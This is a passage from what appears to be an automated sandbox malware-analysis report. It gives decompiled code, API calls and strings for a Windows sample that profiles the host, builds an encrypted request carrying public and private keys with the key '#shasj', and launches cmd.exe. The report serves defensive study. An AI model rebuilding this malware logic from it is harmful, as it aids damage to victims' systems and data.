RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
GetLastError.KERNEL32(?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D66
RegCloseKey.ADVAPI32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D6F

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
Instruction ID: 038fbdeb07fc8f9d94efb3036f8b9b37cf4c52d37effb2f9ef8d9ff464795a08
Opcode Fuzzy Hash: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
Instruction Fuzzy Hash: 3D011A7260011CABCB209F94EE09DDA7B7CEF08351F008162FD05E6121D7329E20EBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF0 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t2;

				E004048A0(_t2); // executed
				ExitProcess(0);
			}

0x00404af3
0x00404afa

APIs

Part of subcall function 004048A0: Sleep.KERNELBASE(000003E8), ref: 004048AB
Part of subcall function 004048A0: ExitProcess.KERNEL32 ref: 004048BC

ExitProcess.KERNEL32 ref: 00404AFA

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ExitProcess$Sleep
String ID:
API String ID: 1320946285-0
Opcode ID: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
Instruction ID: 1b19d15e4aeeb9909d6bd86e0db19be6c339a400cc2da824b43fea8bc324f338
Opcode Fuzzy Hash: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
Instruction Fuzzy Hash: 56A011302082080AE0803BA2A80AB0A320C0B00A02F800030A208A80C208A8280080AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405750 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00405750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t170;
				signed int _t172;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				int _t210;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_t210 = __edx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E004039B0( &_v404);
				E00406D90( &_v492);
				_t255 = E00406BA0( &_v492);
				_t7 = _a8 + _t210 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E004069A0( &_v440, _t259);
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.1");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0x410128]");
					_v448 = _t233;
					_t234 =  *0x410134; // 0x6a73
					_v444 = _t234;
					_t235 =  *0x410136; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E00408B30( &_v295, 0, 0xff);
					E00405C40( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E00405CF0( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E00405370(_t283,  &_v508, 1);
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E00407720( &_v408);
				return _t268;
			}

0x0040575f
0x00405760
0x00405762
0x00405763
0x00405768
0x0040576c
0x0040576e
0x00405772
0x00405774
0x00405775
0x00405777
0x00405778
0x0040577a
0x0040577b
0x0040577d
0x0040577e
0x00405783
0x00405785
0x00405786
0x0040578f
0x00405798
0x004057a9
0x004057b4
0x004057ba
0x004057c0
0x004057c6
0x004057c8
0x004057cc
0x004057d3
0x004057dc
0x004057f1
0x004057f5
0x004057e2
0x004057e2
0x004057e5
0x004057e9
0x004057ed
0x004057ed
0x004057ff
0x00405806
0x0040581f
0x0040581f
0x00405821
0x00405808
0x00405808
0x0040580d
0x00000000
0x0040580f
0x0040580f
0x00405811
0x00405815
0x00405817
0x00405819
0x00405819
0x0040580d
0x0040582a
0x0040582e
0x0040583d
0x0040583f
0x0040583f
0x00405845
0x00000000
0x0040584b
0x0040584b
0x00405857
0x0040586a
0x0040586f
0x00405883
0x0040588c
0x004058a0
0x004058a5
0x004058af
0x004058b3
0x004058b7
0x004058bf
0x004058c1
0x004058c5
0x004058c8
0x004058df
0x004058ce
0x004058d1
0x004058d5
0x004058d9
0x004058d9
0x004058ea
0x004058f0
0x004058fa
0x004058fa
0x00405906
0x0040590c
0x0040590e
0x00405912
0x00405916
0x00405920
0x00405920
0x00405925
0x0040592b
0x0040592e
0x0040592e
0x00405933
0x00405934
0x00405936
0x0040593a
0x0040593e
0x0040593e
0x00405943
0x00405949
0x0040594b
0x0040594f
0x00405953
0x00405953
0x00405958
0x0040595e
0x00405961
0x00405961
0x00405966
0x00405967
0x00405969
0x0040596d
0x00405953
0x00405971
0x00405981
0x00405990
0x00405994
0x0040599f
0x004059a2
0x004059c0
0x004059cc
0x004059cf
0x004059f1
0x004059fd
0x00405a17
0x00405a27
0x00405a29
0x00405a2f
0x00405a38
0x00405a46
0x00405a3e
0x00405a3e
0x00405a3e
0x00405a4e
0x00405a50
0x00405a56
0x00405a58
0x00405a67
0x00405a6b
0x00405a77
0x00405a7c
0x00405a85
0x00405a8b
0x00405a8f
0x00405a97
0x00405ab8
0x00405ac1
0x00405acf
0x00405ade
0x00405ae2
0x00405afe
0x00405b00
0x00405b00
0x00405b10
0x00405b10
0x00405b1d
0x00405b23
0x00405b23
0x00405b26
0x00405b2c
0x00405b36
0x00405b36
0x00405b2e
0x00405b2e
0x00405b34
0x00000000
0x00000000
0x00405b34
0x00405b3f
0x00405b45
0x00405b47
0x00405b4b
0x00405b50
0x00405b50
0x00405b55
0x00405b5b
0x00405b5e
0x00405b5e
0x00405b63
0x00405b64
0x00405b66
0x00405b6a
0x00405b50
0x00405b6e
0x00405b84
0x00405b90
0x00405b9a
0x00405ba4
0x00405bd7
0x00405bdd
0x00405be2
0x00405be2
0x00405bf6
0x00405c03
0x00405c10
0x00405c1a
0x00405c1a
0x00405ba6
0x00405bb7
0x00405bc4
0x00405bd1
0x00405bd3
0x00405bd3
0x00405ba4
0x00405c2a
0x00405c30
0x00405c3d

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 004057C0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0040586A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00405883
lstrlenA.KERNEL32(00000000), ref: 0040588C
lstrlenA.KERNEL32(?), ref: 00405894
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004058A5
lstrlenA.KERNEL32(?), ref: 004058BF
lstrlenA.KERNEL32(00000000), ref: 004058E8
lstrlenA.KERNEL32(?), ref: 00405908
lstrlenA.KERNEL32(?), ref: 00405934
lstrlenA.KERNEL32(00000000), ref: 00405945
lstrlenA.KERNEL32(00000000), ref: 00405967
lstrcatW.KERNEL32(?,action=call&), ref: 00405981
lstrlenW.KERNEL32(?), ref: 0040598A
lstrcatW.KERNEL32(?,&pub_key=), ref: 0040599F
lstrlenW.KERNEL32(?), ref: 004059A2
lstrlenA.KERNEL32(00000000), ref: 004059AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 004059C0
lstrcatW.KERNEL32(?,&priv_key=), ref: 004059CC
lstrlenW.KERNEL32(?), ref: 004059CF
lstrlenA.KERNEL32(00000000), ref: 004059DC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 004059F1
lstrcatW.KERNEL32(?,&version=2.1), ref: 004059FD
lstrlenW.KERNEL32(?), ref: 00405A09
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00405A1D
lstrlenW.KERNEL32(?), ref: 00405A2D
lstrlenW.KERNEL32(?), ref: 00405A4E
_memset.LIBCMT ref: 00405A97
lstrlenA.KERNEL32(?), ref: 00405AAA

Part of subcall function 00405C40: _memset.LIBCMT ref: 00405C6D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00405AF6
GetLastError.KERNEL32 ref: 00405B00
lstrlenA.KERNEL32(?), ref: 00405B07
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405B16
lstrlenA.KERNEL32(?), ref: 00405B21
lstrlenA.KERNEL32(?), ref: 00405B41
lstrlenA.KERNEL32(?), ref: 00405B64
lstrlenA.KERNEL32(00000000), ref: 00405B73
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00405B84
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BB7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BC4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BD1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BF6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C03
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C10
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C2A

Strings

action=call&, xrefs: 0040597B
&pub_key=, xrefs: 00405999
&priv_key=, xrefs: 004059C6
#shasj, xrefs: 00405A50
&version=2.1, xrefs: 004059F7

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
API String ID: 2781787645-879081296
Opcode ID: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
Instruction ID: 3a474d479e6cb3117948b119d777232bcba310bd2a7d749a27062e74eb6ba077
Opcode Fuzzy Hash: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
Instruction Fuzzy Hash: CEE18C71608301AFE710DF25CC85B6BBBE5EB88754F00492EF585A72A0D774AD05CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405050 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 191
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405050(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				CHAR* _v12;
				int _v16;
				char _v18;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				void* _v36;
				CHAR** _v40;
				void* _v44;
				char _v299;
				char _v300;
				void* _v356;
				void* _v360;
				int _t55;
				int _t56;
				BYTE* _t57;
				int _t59;
				void* _t63;
				void* _t64;
				char _t65;
				void* _t77;
				signed int _t79;
				signed int _t81;
				int _t82;
				int _t85;
				char _t87;
				CHAR* _t95;
				int _t97;
				char* _t98;
				void* _t107;
				void* _t108;
				signed char _t109;
				short* _t111;
				WCHAR* _t116;
				CHAR* _t117;
				BYTE* _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				void* _t127;
				long _t128;
				char* _t129;
				int _t130;
				void* _t131;
				CHAR* _t132;
				void* _t133;
				long _t134;
				char* _t135;

				_v40 = __edx;
				_v12 = __ecx;
				_t55 = lstrlenA(__ecx);
				_t107 = VirtualAlloc;
				_t56 = _t55 + 1;
				_v16 = _t56;
				_t4 = _t56 + 1; // 0x2
				_t128 = _t4;
				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
				_v44 = _t57;
				if(_t57 == 0 || _v16 >= _t128) {
					_t124 = 0;
					__eflags = 0;
				} else {
					_t124 = _t57;
				}
				_t129 = 0;
				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
				_t144 = _t59;
				if(_t59 == 0) {
					GetLastError();
					goto L26;
				} else {
					_t63 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0x410128]");
					_t130 = _v16;
					_v24 = _t63;
					_t64 =  *0x410134; // 0x6a73
					_v20 = _t64;
					_t65 =  *0x410136; // 0x0
					_v18 = _t65;
					asm("movq [ebp-0x1c], xmm0");
					_v300 = 0;
					E00408B30( &_v299, 0, 0xff);
					E00405C40( &_v300,  &_v32, lstrlenA( &_v32));
					E00405CF0( &_v300, _t124, _t130);
					_t116 =  &_v32;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x1c], xmm0");
					E004033E0(_t116, _t144, _t124);
					if(_v32 != 0) {
						E00404FD0();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t107);
						_push(_t130);
						_push(_t124);
						_t125 = _t116;
						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v360 = _t131;
						GetModuleFileNameW(0, _t131, 0x200);
						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
						_v356 = _t108;
						__eflags = _t108 - 0xffffffff;
						if(_t108 != 0xffffffff) {
							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
							_v28 = _t77;
							__eflags = _t77;
							if(_t77 != 0) {
								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
								_v16 = _t79;
								__eflags = _t79;
								if(_t79 != 0) {
									_t41 = _t79 + 0x4e; // 0x4e
									_t132 = _t41;
									_v12 = _t132;
									_t81 = lstrlenW(_t125);
									_t109 = 0;
									_t126 =  &(_t125[_t81]);
									_t82 = lstrlenA(_t132);
									__eflags = _t82 + _t82;
									if(_t82 + _t82 != 0) {
										_t117 = _t132;
										do {
											__eflags = _t109 & 0x00000001;
											if((_t109 & 0x00000001) != 0) {
												 *((char*)(_t126 + _t109)) = 0;
											} else {
												_t87 =  *_t132;
												_t132 =  &(_t132[1]);
												 *((char*)(_t126 + _t109)) = _t87;
											}
											_t109 = _t109 + 1;
											_t85 = lstrlenA(_t117);
											_t117 = _v12;
											__eflags = _t109 - _t85 + _t85;
										} while (_t109 < _t85 + _t85);
									}
									UnmapViewOfFile(_v16);
									_t108 = _v20;
									_t131 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t108);
						}
						return VirtualFree(_t131, 0, 0x8000);
					} else {
						_t127 = _v28;
						_v12 = 1;
						if(_t127 != 0) {
							_t97 = lstrlenA(_t127);
							_v8 = _t97;
							_t24 = _t97 + 1; // 0x1
							_t134 = _t24;
							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
							_v36 = _t98;
							if(_t98 == 0 || _v8 >= _t134) {
								_t135 = 0;
								__eflags = 0;
							} else {
								_t135 = _t98;
							}
							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
								if(_t111 != 0) {
									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
										GetLastError();
									} else {
										 *0x412b00 = _t111;
									}
								}
							}
							VirtualFree(_v36, 0, 0x8000);
						}
						_t33 =  &_v24; // 0x4054e4
						_t133 =  *_t33;
						if(_t133 != 0) {
							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
							 *_v40 = _t95;
							if(_t95 != 0) {
								lstrcpyA(_t95, _t133);
							}
						}
						_t88 = GetProcessHeap;
						if(_t127 != 0) {
							HeapFree(GetProcessHeap(), 0, _t127);
							_t88 = GetProcessHeap;
						}
						if(_t133 != 0) {
							HeapFree( *_t88(), 0, _t133);
						}
						_t129 = _v12;
						L26:
						VirtualFree(_v44, 0, 0x8000);
						return _t129;
					}
				}
			}

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 00405065
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405082
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004050A5
_memset.LIBCMT ref: 004050F2
lstrlenA.KERNEL32(?), ref: 004050FE
lstrlenA.KERNEL32(?,00000000), ref: 00405152
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00405168
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0040518A
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004051A8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 004051C0
GetLastError.KERNEL32 ref: 004051D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004051E8
lstrlenA.KERNEL32(T@,00003000,00000004,00000000), ref: 004051FD
VirtualAlloc.KERNEL32(00000000,00000001), ref: 00405207
lstrcpyA.KERNEL32(00000000,T@), ref: 00405214
HeapFree.KERNEL32(00000000), ref: 0040522F
HeapFree.KERNEL32(00000000), ref: 00405240
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040524F
GetLastError.KERNEL32 ref: 0040525E

Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
Part of subcall function 00404FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
Part of subcall function 00404FD0: wsprintfW.USER32 ref: 00405019
Part of subcall function 00404FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
Part of subcall function 00404FD0: ExitProcess.KERNEL32 ref: 0040503B

Strings

T@, xrefs: 004051EE, 004051FC, 00405212, 0040523A
#shasj, xrefs: 004050B3

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
